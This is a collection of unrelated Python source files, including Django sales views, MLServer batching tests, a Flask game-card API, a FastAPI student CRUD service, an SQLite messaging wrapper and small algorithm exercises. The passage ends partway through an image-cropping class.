home = TemplateView.as_view(template_name='index.html')
about = TemplateView.as_view(template_name='about.html')
class CustomerList(CounterMixin, FirstnameSearchMixin, ListView):
template_name = 'core/person/customer_list.html'
model = Customer
paginate_by = 8
class CustomerDetail(DetailView):
template_name = 'core/person/customer_detail.html'
model = Customer
class CustomerUpdate(UpdateView):
template_name = 'core/person/customer_edit.html'
model = Customer
success_url = reverse_lazy('customer_detail')
class SellerList(CounterMixin, FirstnameSearchMixin, ListView):
template_name = 'core/person/seller_list.html'
model = Seller
paginate_by = 8
class SellerDetail(DetailView):
template_name = 'core/person/seller_detail.html'
model = Seller
class BrandList(CounterMixin, ListView):
template_name = 'core/product/brand_list.html'
model = Brand
class ProductList(CounterMixin, ListView):
template_name = 'core/product/product_list.html'
model = Product
paginate_by = 100
def get_queryset(self):
p = Product.objects.all()
q = self.request.GET.get('search_box')
# buscar por produto
if q is not None:
p = p.filter(product__icontains=q)
# filtra produtos em baixo estoque
if self.request.GET.get('filter_link', False):
p = p.filter(stock__lt=F('stock_min'))
# filtra produtos fora de linha
if self.request.GET.get('outofline', False):
p = p.filter(outofline=1)
return p
def sale_create(request):
order_forms = Sale()
item_order_formset = inlineformset_factory(
Sale, SaleDetail, form=SaleDetailForm, extra=0, can_delete=False,
min_num=1, validate_min=True)
if request.method == 'POST':
forms = SaleForm(request.POST, request.FILES,
instance=order_forms, prefix='main')
formset = item_order_formset(
request.POST, request.FILES, instance=order_forms, prefix='product')
if forms.is_valid() and formset.is_valid():
forms = forms.save()
formset.save()
return HttpResponseRedirect(resolve_url('core:sale_detail', forms.pk))
else:
forms = SaleForm(instance=order_forms, prefix='main')
formset = item_order_formset(instance=order_forms, prefix='product')
context = {
'forms': forms,
'formset': formset,
}
return render(request, 'core/sale/sale_form.html', context)
class SaleList(CounterMixin, ListView):
template_name = 'core/sale/sale_list.html'
model = Sale
paginate_by = 20
def get_queryset(self):
# filtra vendas com um item
if 'filter_sale_one' in self.request.GET:
return Sale.objects.annotate(
itens=Count('sales_det')).filter(itens=1)
# filtra vendas com zero item
if 'filter_sale_zero' in self.request.GET:
return Sale.objects.annotate(
itens=Count('sales_det')).filter(itens=0)
# filtros no queryset
qs = super(SaleList, self).get_queryset()
# clica no cliente e retorna as vendas dele
if 'customer' in self.request.GET:
qs = qs.filter(customer=self.request.GET['customer'])
# clica no vendedor e retorna as vendas dele
if 'seller' in self.request.GET:
qs = qs.filter(seller=self.request.GET['seller'])
return qs
class SaleDetailView(DetailView):
template_name = 'core/sale/sale_detail.html'
model = Sale
context_object_name = 'Sale'
def get_context_data(self, **kwargs):
sd = SaleDetail.objects.filter(sale=self.object)
context = super(SaleDetailView, self).get_context_data(**kwargs)
context['count'] = sd.count()
context['Itens'] = sd
return context
|
|
tests/batching/test_adaptive.py
|
alexander-manley/MLServer
|
|
|
import asyncio
import pytest
from typing import List
from mlserver.batching.adaptive import AdaptiveBatcher
from mlserver.batching.shape import Shape
from mlserver.types import InferenceRequest, RequestInput
from mlserver.model import MLModel
from mlserver.utils import generate_uuid
from .conftest import TestRequestSender
async def test_batch_requests(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
):
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
batched_requests = [
batched_req async for batched_req in adaptive_batcher._batch_requests()
]
assert len(batched_requests) == 1
assert batched_requests[0].inference_requests == sent_requests
async def test_batch_requests_timeout(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
):
"""
Test that a batch size smaller than the max batch size, the timeout is hit
and the request gets processed.
"""
for _ in range(2):
sent_request = dict([await send_request()])
batched_requests = [
batched_req async for batched_req in adaptive_batcher._batch_requests()
]
assert len(batched_requests) == 1
assert batched_requests[0].inference_requests == sent_request
async def test_batcher(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
sum_model: MLModel,
):
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
await adaptive_batcher._batcher()
assert sent_requests.keys() == adaptive_batcher._async_responses.keys()
for internal_id, sent_request in sent_requests.items():
async_response = adaptive_batcher._async_responses[internal_id]
response = await async_response
assert sent_request.id == response.id
expected = await sum_model.predict(sent_request)
assert expected == response
async def test_batcher_propagates_errors(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
mocker,
):
message = "This is an error"
async def _async_exception():
raise Exception(message)
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
adaptive_batcher._predict_fn = mocker.stub("_predict_fn")
adaptive_batcher._predict_fn.return_value = _async_exception()
await adaptive_batcher._batcher()
for internal_id, _ in sent_requests.items():
with pytest.raises(Exception) as err:
await adaptive_batcher._async_responses[internal_id]
assert str(err.value) == message
async def test_batcher_cancels_responses(
adaptive_batcher: AdaptiveBatcher,
mocker,
):
message = "This is an error"
async def _async_exception():
raise Exception(message)
num_requests = adaptive_batcher._max_batch_size * 2 + 2
adaptive_batcher._batcher = mocker.stub("_batcher")
adaptive_batcher._batcher.side_effect = iter(_async_exception, None)
requests = [
InferenceRequest(
id=generate_uuid(),
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[idx, idx + 1, idx + 2],
)
],
)
for idx in range(num_requests)
]
responses = await asyncio.gather(
*[adaptive_batcher.predict(request) for request in requests],
return_exceptions=True,
)
for response in responses:
assert isinstance(response, Exception)
assert str(response) == message
@pytest.mark.parametrize(
"requests",
[
[
InferenceRequest(
id=f"request-{idx}",
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[idx, idx + 1, idx + 2],
)
],
)
# 10 is the max_batch_size for sum_model
# Make sure one batch is only half-full
for idx in range(10 * 2 + 2)
],
[
InferenceRequest(
id="large-request",
inputs=[
# 10 is the max batch size, so we send a minibatch with
# 20 entries
RequestInput(
name="input-0",
shape=[10 * 2, 3],
datatype="INT32",
data=[n for n in range(10 * 2 * 3)],
)
],
),
InferenceRequest(
id="regular-request",
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[1000, 1001, 1002],
)
],
),
],
],
)
async def test_predict(
requests: List[InferenceRequest],
adaptive_batcher: AdaptiveBatcher,
sum_model: MLModel,
):
responses = await asyncio.gather(
*[adaptive_batcher.predict(request) for request in requests]
)
assert len(requests) == len(responses)
for req, res in zip(requests, responses):
assert req.id == res.id
req_shape = Shape(req.inputs[0].shape)
res_shape = Shape(res.outputs[0].shape)
assert req_shape.batch_size == res_shape.batch_size
expected = await sum_model.predict(req)
assert res == expected
|
|
vue_uikit/vues/tools/errorCode.py
|
|
|
|
"""
errorCode
"""
#
userDoesNotExits = 1001 # 用户不存在
userHasBeenExits = 1002 # 用户已存在
userOrPasswordError = 1003 # 用户名或密码错误
serverBusy = 1004 # 服务器繁忙
|
|
|
|
|
|
import os
from flask import Flask, send_from_directory
from flask_cors import CORS
from aor_parser import \
AORTechParser, AORCardParser, \
AORStringsParser, HomecityParser
app = Flask(__name__, static_url_path='')
cors = CORS(app)
current_path = os.getcwd()
tech_parser = AORTechParser(
current_path + '\\data\\Data\\techtreey.xml')
strings_parser = AORStringsParser(
current_path + '\\data\\Data\\strings')
homecity_parser = HomecityParser(current_path + '\\data\\Data', current_path + '\\data\\Data\\civs.xml')
parser = AORCardParser(
current_path + '\\data\\Data',
tech_parser,
strings_parser,
homecity_parser
)
@app.route(
'/api/get_cards',
methods=['GET'])
def index():
return parser.cards
@app.route('/img/<path:path>')
def send_js(path):
return send_from_directory('data/pictures/Data/wpfg', path)
if __name__ == '__main__':
app.debug = True
app.run(host='0.0.0.0', port=5005)
|
|
src/deprecated/test_rl.py
|
|
|
|
import torch
import torch.optim as optim
from itertools import count
import argparse
from os.path import join
from agent import NSQ
from policy import PolicyNet
from game import VFGGAME
from explorer import Explorer
from util import logger
from train_new import MACHINE_LABEL_DIR_HOLDOUT, CLASSIFIER_ROOT_HOLDOUT
from train_new import test_all
from deprecated.lsun import test_lsun_model_holdout, train_lsun_model_holdout
def parse_arguments():
parser = argparse.ArgumentParser(description="training N-step Q learning")
parser.add_argument('--category', type=str, default='cat',
help='image category')
parser.add_argument('--budget', type=int, default=10000,
help='maximum number of examples for human annotation')
parser.add_argument('--eps-start', type=float, default=0.9,
help='starting epsilon')
parser.add_argument('--eps-end', type=float, default=0.05,
help='ending epsilon')
parser.add_argument('--decay-steps', type=int, default=100000,
help='decay steps')
parser.add_argument('--gamma', type=float, default=0.999,
help='discount factor')
parser.add_argument('--duration', '-N', type=int, default=100,
help='get reward every N steps')
parser.add_argument('--batch-size', type=int, default=128,
help='batch size')
parser.add_argument('--target-update', '-T', type=int, default=1000,
help='update target network every T steps')
parser.add_argument('--learning-start', type=int, default=50000)
parser.add_argument('--buffer-size', type=int, default=100000)
parser.add_argument('--num-actions', type=int, default=2,
help='default action is `keep` or `drop`')
parser.add_argument('--input_dim', type=int, default=2048,
help='feature size')
parser.add_argument('--save-every', type=int, default=1,
help='save the checkpoint every K episode')
parser.add_argument('--val_rate', type=float, default=0.2)
parser.add_argument('--test_rate', type=float, default=0.2)
# flags for the game
parser.add_argument('--eval-dir', type=str, default='',
help='path to the training list folder')
parser.add_argument('--train-prefix', type=str, default='train',
help='prefix of the training files')
parser.add_argument('--key-path', type=str,
help='key path for the unknown data set')
parser.add_argument('--work-dir', type=str, default='', help = 'work dir')
parser.add_argument('--pretrained', type=str, default='', help='path to pretrained NSQ policy')
args = parser.parse_args()
global work_dir
work_dir = args.work_dirs
return args
def test_nsq(args, game, q_func):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
input_dim = args.input_dim
num_actions = args.num_actions
Q = q_func(input_dim, num_actions).to(device)
target_Q = q_func(input_dim, num_actions).to(device)
optimizer = optim.RMSprop(Q.parameters())
expr = Explorer(args.eps_start, args.eps_end, decay_steps=args.decay_steps)
robot = NSQ(Q, target_Q, optimizer, expr,
gamma=args.gamma, num_actions=num_actions)
episode_durations = []
# Pipeline params
category = args.category
# Set initial unsure key path
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, '{}_trial_{}_unsure.p'.format(category, 0))
# Test on RL agent
logger.info('Testing on RL agent')
for i_episode in range(1, args.episodes + 1):
game.reset(new_key_path)
# pipeline param
trial = i_episode
robot.q_function.reset_hidden(args.batch_size)
robot.target_q_function.reset_hidden(args.batch_size)
# sample the initial feature from the environment
# since our policy network takes the hidden state and the current
# feature as input. The hidden state is passed implicitly
state = game.sample()
for t in count():
action, qvalue = robot.act(state)
reward, next_state, done = game.step(action)
if action > 0 and (game.chosen % game.duration == 0
or game.chosen == game.budget):
# Train the classifier
game.train_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)
# select threshold
game.test_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)
state = next_state
if done:
episode_durations.append(t + 1)
# propagate through the whole dataset and split
test_all_data_holdout(category, i_episode, "RL")
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'RL', '{}_trial_{}_unsure.p'.format(category, trial))
break
# Test on LSUN
logger.info("Testing on LSUN")
for i_episode in range(1, args.episodes + 1):
trial = i_episode
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'latest_LSUN',
'{}_trial_{}_unsure.p'.format('cat', trial - 1))
train_lsun_model_holdout(game, "latest_LSUN", CLASSIFIER_ROOT_HOLDOUT, new_key_path)
test_lsun_model_holdout("latest_LSUN", CLASSIFIER_ROOT_HOLDOUT)
test_all_data_holdout(category, i_episode, "LSUN")
def test_all_data_holdout(category, i_episode, mode):
"""
test to split the dataset
:return:
"""
trial = i_episode
model_file_dir = join(CLASSIFIER_ROOT_HOLDOUT, 'latest_{}'.format(mode), 'snapshots')
last_trial_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, mode,
'{}_trial_{}_unsure.p'.format(category, trial - 1))
test_all(last_trial_key_path, trial, 'resnet', 'cat', model_file_dir)
def main():
args = parse_arguments()
game = VFGGAME(args)
q_func = PolicyNet
test_nsq(args, game, q_func)
if __name__ == '__main__':
main()
|
|
Task03/FindWordOccurence.py
|
|
|
|
import re
text = [
"Hello, World!",
"The world is mine",
"Hello, how are you?"
]
def get_words(text):
words = []
for sentence in text:
words_in_sentence = re.findall(r'\w+', sentence.lower())
for item in words_in_sentence:
words.append(item)
return words
def get_words_dict(words):
words_dict = dict()
for word in words:
if word in words_dict:
words_dict[word] = words_dict[word] + 1
else:
words_dict[word] = 1
return words_dict
def get_index_text(word):
for sentence in text:
sentence_words = re.split(r'\W+', sentence.lower())
if word in sentence_words:
return text.index(sentence)
def main():
words = get_words(text)
words_dict = get_words_dict(words)
print(f"{'word':10}{'count':<10}{'occurrence':>10}")
for word in words_dict:
index_occerence = get_index_text(word)
print(f"{word:<10}{words_dict[word]:<10}{index_occerence:<10}")
main()
|
|
src/iam_sarif_report/bootstrap.py
|
georgealton/iam-policy-validator-to-sarif
|
|
|
from __future__ import annotations
import punq
from .adapters import checks, reader, reporter, validator
from .domain import converter
from .service_layer import bus, handlers
def bootstrap() -> bus.Bus:
container = punq.Container()
container.register("Reader", reader.LocalFileReader)
container.register("ChecksRepository", checks.ChecksPackageDataRepository)
container.register("Reporter", reporter.CLIReporter)
container.register("Converter", converter.SarifConverter)
container.register("Validator", validator.AWSAccessAnalyzerValidator)
return bus.Bus(
command_handlers={
Command: container.instantiate(Handler)
for Command, Handler in handlers.Handler.registry.items()
}
)
|
|
|
|
|
|
#!/usr/bin/env python3
"""
Crack the XMAS encoding.
https://adventofcode.com/2020/day/9
"""
import argparse
def fetch_preamble(file, n):
"""
Given a file, read the first n numbers. Sort the list for faster search.
Return both the original list and the sorted list as a tuple.
"""
numbers = []
while len(numbers) < n:
numbers.append(fetch_next(file))
return (numbers, sorted(numbers))
def fetch_next(file):
return int(file.readline())
def update(ls, new_number):
"""
Given a tuple of original list and sorted list, add the new number to the
lists and drop the oldest number. Return the updated tuple. (they are also
updated by reference).
"""
(numbers, sorted_numbers) = ls
drop = numbers[0]
numbers = numbers[1:] + [new_number]
sorted_numbers.remove(drop) # ok for there to be duplicates b/c we just remove the first one!
sorted_numbers.append(new_number)
sorted_numbers.sort() # would be more efficient to iterate once and insert/remove but who cares
return (numbers, sorted_numbers)
def is_valid(ls, number):
"""
Given a tuple of original list and sorted list, determine whether the next
number is valid (ie, is a sum of some pair in the list)
"""
(numbers, sorted_numbers) = ls
for i in range(len(sorted_numbers) - 1, 0, -1):
if sorted_numbers[i] > number:
continue
for j in range(0, i):
if sorted_numbers[i] + sorted_numbers[j] == number:
return True
return False
def find_range(file, target):
"""
Given a file, read numbers to find a contiguous list of numbers that sums to
the given target number. Return the list.
"""
numbers = []
candidate = sum(numbers)
while candidate != target:
if candidate > target:
numbers.pop(0)
else:
numbers.append(fetch_next(file))
candidate = sum(numbers)
return numbers
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('filename', help='Path to the file containing XMAS data')
parser.add_argument('--tail-len', type=int, default=25, help='Length of preamble/previous N numbers to consider')
args = parser.parse_args()
with open(args.filename, 'r') as f:
tail = fetch_preamble(f, args.tail_len)
number = fetch_next(f)
while(is_valid(tail, number)):
tail = update(tail, number)
number = fetch_next(f)
target_number = number
print('Invalid number (target):', target_number)
f.seek(0)
contig = find_range(f, target_number)
print('Found range that sums to target number:', contig)
xmas = min(contig) + max(contig)
print('XMAS value:', xmas)
|
|
algorithm/about_merge_sort.py
|
dictxwang/python-fragments
|
|
|
# -*- coding: utf8 -*-
__author__ = 'wangqiang'
'''
归并排序:最坏时间复杂度 n*lgn 采用分而治之的方式
'''
def merge_sort(lst):
if len(lst) <= 1:
return lst
middle = len(lst) // 2
# 分别递归排序左右两个子序列
left = merge_sort(lst[:middle])
right = merge_sort(lst[middle:])
# 对已排序的子序列进行合并
i = 0
j = 0
k = 0
result = [0] * len(lst)
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result[k] = left[i]
i += 1
else:
result[k] = right[j]
j += 1
k += 1
# 将子序列多出的元素直接追加到结果序列中
while i < len(left):
result[k] = left[i]
k += 1
i += 1
while j < len(right):
result[k] = right[j]
k += 1
j += 1
return result
if __name__ == '__main__':
lst = [23, 1, 4, 5, -10, 56, 190, 230, 20, 30, 40, 50]
lst = merge_sort(lst)
print(lst)
|
|
sector/migrations/0004_auto_20180305_1429.py
|
|
|
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-03-05 14:29
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtailmarkdown.blocks
class Migration(migrations.Migration):
dependencies = [
('sector', '0003_sectorpage_show_on_frontpage'),
]
operations = [
migrations.AlterField(
model_name='sectorpage',
name='pullout',
field=wagtail.core.fields.StreamField((('content', wagtail.core.blocks.StructBlock((('text', wagtailmarkdown.blocks.MarkdownBlock()), ('stat', wagtail.core.blocks.CharBlock()), ('stat_text', wagtail.core.blocks.CharBlock())), max_num=1, min_num=0)),), blank=True),
),
]
|
|
ui/maintenance_protocols/configure_make_install.py
|
|
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 29/12/2017 10:05 AM
# @Project : main
# @Author : <NAME>
# @File : configure_make_install.py
def get_sub_protocol(db_obj, protocol_parent, step_order_start=1):
steps = list()
steps.append(db_obj(software='./configure',
parameter='--prefix {{UserBin}}',
parent=protocol_parent,
user_id=0,
hash='dfca5277f71c6782e3351f6ed9ac7fcb',
step_order=step_order_start))
steps.append(db_obj(software='make',
parameter='',
parent=protocol_parent,
user_id=0,
hash='099dafc678df7d266c25f95ccf6cde22',
step_order=step_order_start+1))
steps.append(db_obj(software='make',
parameter='install',
parent=protocol_parent,
user_id=0,
hash='12b64827119f4815ca8d43608d228f36',
step_order=step_order_start+2))
return step_order_start+len(steps), steps
|
|
src/api_segura/app/app.py
|
|
|
|
from typing import List
from fastapi import FastAPI, Depends
from fastapi.exceptions import HTTPException
from sqlalchemy.orm import Session
from app import crud
from app import models
from app import schemas
from app.db import create_db_and_tables, get_db
from app.users import auth_backend, current_active_user, fastapi_users
app = FastAPI()
@app.get("/api/", response_model=List[schemas.SchemaAlumno])
def vuelca_base(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
alumnos = crud.consulta_alumnos(db, skip=skip, limit=limit)
return alumnos
@app.get("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def get_alumno(cuenta, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
return alumno
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
@app.delete("/api/{cuenta}")
async def delete_alumno(cuenta, user: models.UserDB = Depends(current_active_user), db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
crud.baja_alumno(db=db, alumno=alumno)
return {}
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
@app.post("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def post_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
raise HTTPException(status_code=409, detail="Recurso existente")
return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato)
@app.put("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def put_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
crud.baja_alumno(db=db, alumno=alumno)
return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato)
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
AUTH_PATH ='/auth'
app.include_router(fastapi_users.get_auth_router(auth_backend),
prefix=f"{AUTH_PATH}/jwt",
tags=["auth"])
app.include_router(fastapi_users.get_register_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"])
app.include_router(fastapi_users.get_reset_password_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"],)
app.include_router(fastapi_users.get_verify_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"],)
app.include_router(fastapi_users.get_users_router(),
prefix="/users",
tags=["users"])
@app.on_event("startup")
async def on_startup():
# Not needed if you setup a migration system like Alembic
await create_db_and_tables()
|
|
|
|
|
|
# -*- coding: utf-8 -*-
from os.path import realpath, dirname, join
from re import compile
from sqlite3 import connect
class SafeBase:
def __init__(self, g, database_filename):
self.g = g
posizione = dirname(realpath(__file__))
self.percorso = join(posizione, database_filename)
self.init_db()
def init_db(self):
database = connect(self.percorso)
cursore = database.cursor()
cursore.execute('''
CREATE TABLE IF NOT EXISTS utente (
username TEXT PRIMARY KEY,
password TEXT NOT NULL,
chiave TEXT NOT NULL,
sale TEXT NOT NULL
)
''')
database.commit()
cursore.execute('''
CREATE TABLE IF NOT EXISTS profilo (
username TEXT PRIMARY KEY,
nome TEXT,
cognome TEXT,
stato TEXT,
foto TEXT
)
''')
database.commit()
cursore.execute('''
CREATE TABLE IF NOT EXISTS messaggio (
chiave INTEGER PRIMARY KEY AUTOINCREMENT,
proprietario TEXT NOT NULL,
partecipante TEXT NOT NULL,
mittente TEXT NOT NULL,
immagine INT DEFAULT 0,
testo TEXT NOT NULL,
data_ora DATETIME DEFAULT CURRENT_TIMESTAMP,
letto INT DEFAULT 0
)
''')
database.commit()
cursore.execute('''
CREATE VIEW IF NOT EXISTS ultimo_messaggio AS
SELECT m.proprietario, m.mittente, m.partecipante, m.testo, m.immagine, m.data_ora, m.letto
FROM messaggio m
INNER JOIN (
SELECT proprietario, partecipante, MAX(data_ora) AS data_ora
FROM messaggio
GROUP BY proprietario, partecipante
) u
ON u.proprietario = m.proprietario
AND u.partecipante = m.partecipante
AND u.data_ora = m.data_ora
''')
database.commit()
cursore.execute('''
CREATE VIEW IF NOT EXISTS non_letti AS
SELECT proprietario, partecipante,
SUM(CASE letto WHEN 0 THEN 1 ELSE 0 END) AS non_letti
FROM messaggio
GROUP BY proprietario, partecipante
''')
database.commit()
cursore.close()
database.close()
def apri_connessione(self):
self.g.db = connect(self.percorso)
self.g.db.text_factory = str
self.g.db.create_function('REGEXP', 2, self.regexp)
def chiudi_connessione(self):
db = getattr(self.g, 'db', None)
if db is not None:
db.close()
def regexp(self, espressione, oggetto):
reg = compile(espressione)
return reg.search(oggetto) is not None
def leggi_righe(self, query, parametri):
cursore = self.g.db.cursor()
cursore.execute(query, parametri)
risultato = cursore.fetchall()
cursore.close()
return risultato
def leggi_riga(self, query, parametri):
cursore = self.g.db.cursor()
cursore.execute(query, parametri)
risultato = cursore.fetchone()
cursore.close()
return risultato
def leggi_dato(self, query, parametri):
return self.leggi_riga(query, parametri)[0]
def scrivi(self, query, parametri):
cursore = self.g.db.cursor()
cursore.execute(query, parametri)
self.g.db.commit()
cursore.close()
|
|
test/test_pipeline_manager.py
|
zuevval/topological-sorting
|
|
|
from pipeline_manager import pipeline
def test_pipeline_manager():
add_step = pipeline()
a = []
@add_step
def step1():
a.append(1)
@add_step(depends_on=["step1"])
def step2():
a.append(2)
@add_step(depends_on=["step1", "step2"])
def step3():
a.append(3)
@add_step(depends_on=["step1", "step2", "step3"])
def step4():
a.append(4)
step4()
assert a == [1, 1, 2, 1, 1, 2, 3, 4]
a = []
step3()
assert a == [1, 1, 2, 3]
@add_step
def step5():
a.append(5)
a = []
step4()
assert a == [1, 1, 2, 1, 1, 2, 3, 4]
a = []
step5()
assert a == [5]
|
|
|
joelbcastillo/NYCOpenRecords
|
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
app.lib.email_utils
~~~~~~~~~~~~~~~~
Implements e-mail notifications for OpenRecords. Flask-mail is a dependency, and the following environment variables
need to be set in order for this to work: (Currently using Fake SMTP for testing)
MAIL_SERVER: 'localhost'
MAIL_PORT: 2500
MAIL_USE_TLS: FALSE
MAIL_USERNAME: os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD: <PASSWORD>('MAIL_PASSWORD')
DEFAULT_MAIL_SENDER: 'Records Admin <<EMAIL>>'
"""
from flask import current_app, render_template
from flask_mail import Message
from app import mail, celery, sentry
from app.models import Requests
@celery.task
def send_async_email(msg):
try:
mail.send(msg)
except Exception as e:
sentry.captureException()
current_app.logger.exception("Failed to Send Email {} : {}".format(msg, e))
def send_contact_email(subject, recipients, body, sender):
msg = Message(subject, recipients, body, sender=sender)
send_async_email.delay(msg)
def send_email(subject, to=list(), cc=list(), bcc=list(), template=None, email_content=None, **kwargs):
"""
Function that sends asynchronous emails for the application.
Takes in arguments from the frontend.
:param to: Person(s) email is being sent to
:param cc: Person(s) being CC'ed on the email
:param bcc: Person(s) being BCC'ed on the email
:param subject: Subject of the email
:param template: HTML and TXT template of the email content
:param email_content: string of HTML email content that can be used as a message template
:param kwargs: Additional arguments the function may take in (ie: Message content)
"""
assert to or cc or bcc
msg = Message(current_app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=current_app.config['MAIL_SENDER'], recipients=to, cc=cc, bcc=bcc)
# Renders email template from .txt file commented out and not currently used in development
# msg.body = render_template(template + '.txt', **kwargs)
if email_content:
msg.html = email_content
else:
msg.html = render_template(template + '.html', **kwargs)
attachment = kwargs.get('attachment', None)
if attachment:
filename = kwargs.get('filename')
mimetype = kwargs.get('mimetype', 'application/pdf')
msg.attach(filename, mimetype, attachment)
send_async_email.delay(msg)
def get_agency_emails(request_id, admins_only=False):
"""
Gets a list of the agency emails (assigned users and default email)
:param request_id: FOIL request ID to query UserRequests
:param admins_only: return list of agency admin emails only
:return: list of agency emails or ['<EMAIL>'] (for testing)
"""
request = Requests.query.filter_by(id=request_id).one()
if admins_only:
return list(set(user.notification_email if user.notification_email is not None else user.email for user in
request.agency.administrators))
return list(set([user.notification_email if user.notification_email is not None else user.email for user in
request.agency_users] + [request.agency.default_email]))
|
|
topCoder/srms/100s/srm152/div2/league_picks.py
|
|
|
|
class LeaguePicks:
def returnPicks(self, position, friends, picks):
ls, d, r, i = [], True, friends - position + 1, 0
while (d and picks >= position) or (not d and picks >= r):
ls.append(i + (position if d else r))
i += friends
picks -= friends
d = not d
return ls
|
|
|
|
|
|
from typing import List, Any, Dict, Callable, Tuple
from .errors import NoClosingQuote, NoActionFound
from .utils import get_ctxs, Flags, Options
from .action import Action
import re
import traceback
from inspect import isawaitable
quoteRe = re.compile(r"[\"']")
chunk = re.compile(r"\S+")
class SourceStr(str):
pass
class Performer:
def __init__(self, ctx: Tuple[Any, ...] = (), *, loop=None):
self.commands = {}
self.lookup = {}
self.ctx = ctx + (self,)
self.loop = loop
def register(self, cmd):
self.commands[cmd.name] = cmd
self.lookup[cmd.name] = cmd
cmd.performer = self
for alias in cmd.aliases:
self.lookup[alias] = cmd
return cmd
def run(self, args, ctx: Tuple[Any] = ()):
cmd_name = args.split(" ")[0]
cmd = self.lookup.get(cmd_name)
try:
if cmd:
args = self.split_args(args)
options, args = self.get_options(args, cmd.options,
cmd.option_aliases)
flags, args = self.get_flags(args, cmd.flags,
cmd.flag_aliases)
flags = Flags(flags)
options = Options(options)
if self.loop:
coro = cmd.async_invoke(args[1:], ctx + self.ctx +
(flags, options, SourceStr(args[args.index(" ") +1:])))
return self.loop.create_task(coro)
else:
return cmd.invoke(args[1:], ctx + self.ctx +
(flags, options, SourceStr(args[args.index(" ") +1:])))
raise NoActionFound("No Action called {} found".format(cmd_name))
except Exception as e:
if self.loop:
if cmd and cmd.error_handler:
self.loop.create_task(cmd.async_run_fail(e, ctx))
else:
self.loop.create_task(self.async_run_fail(e, ctx))
else:
if cmd and cmd.error_handler:
cmd.run_fail(e, ctx)
else:
self.run_fail(e, ctx)
def error(self, func):
self.fail = func
def fail(self, e):
traceback.print_exception(type(e), e, e.__traceback__)
def run_fail(self, e, ctx: Tuple[Any] = ()):
ctxs = get_ctxs(self.fail, ctx)
self.fail(e, **ctxs)
async def async_run_fail(self, e, ctx: List[Any] = ()):
ctxs = get_ctxs(self.fail, ctx)
if isawaitable(self.fail):
await self.fail(e, **ctxs)
else:
self.fail(e, **ctxs)
def split_args(self, s: str) -> List[str]:
"""Will split the raw input into the arguments"""
args = []
i = 0
while i < len(s):
char = s[i]
if re.match(quoteRe, char):
try:
j = s.index(char, i+1)
args.append(s[i + 1: j])
i = j
except ValueError:
raise NoClosingQuote("Missing closing quote.")
else:
match = chunk.match(s, i)
if match:
args.append(match.group())
i = match.end()
i += 1
return args
def get_options(self, inp: List[str], options: Dict[str, Callable],
aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:
"""Will get options, the return will be converted as setup"""
options_out = {}
for i, arg in enumerate(inp):
name = arg[2:]
if not arg.startswith("-"):
continue
try:
if arg.startswith("-") and name in options.keys():
options_out[name] = options[name](inp[i+1])
del inp[i]
del inp[i]
elif arg.startswith("-") and name in aliases.keys():
options_out[aliases[name]] = options[name](inp[i+1])
del inp[i]
del inp[i]
except Exception as e:
raise e
return options_out, inp
def get_flags(self, inp: List[str], flags: List[str],
aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:
"""Will get all flags"""
out = {name: False for name in flags}
for i, arg in enumerate(inp):
name = arg[1:]
if arg.startswith("-") and name in flags:
out[name] = True
del inp[i]
elif arg.startswith("-") and name in aliases.keys():
out[aliases[name]] = True
del inp[i]
return out, inp
|
|
|
|
|
|
import numpy as np
import torch
import gc
class Crop(object):
"""
Crop randomly the image in a sample.
Args: output_size (tuple or int): Desired output size. If int, square crop is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple, list))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
